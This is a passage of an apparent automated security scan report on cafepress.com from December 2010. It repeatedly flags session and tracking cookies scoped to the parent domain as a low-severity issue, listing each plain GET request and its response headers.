X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59616
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.13. http://www.cafepress.com/+calendars previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+calendars

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 57707
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.14. http://www.cafepress.com/+clocks previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+clocks

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59318
Date: Sun, 26 Dec 2010 13:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.15. http://www.cafepress.com/+coasters previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+coasters

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59255
Date: Sun, 26 Dec 2010 13:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+eat_sleep_game_light_tshirt,299007536

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 93204
Date: Sun, 26 Dec 2010 13:49:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.17. http://www.cafepress.com/+framed-prints previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+framed-prints

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 63735
Date: Sun, 26 Dec 2010 13:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.18. http://www.cafepress.com/+greeting_cards previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+greeting_cards

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59651
Date: Sun, 26 Dec 2010 13:48:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.19. http://www.cafepress.com/+hats-caps previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+hats-caps

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
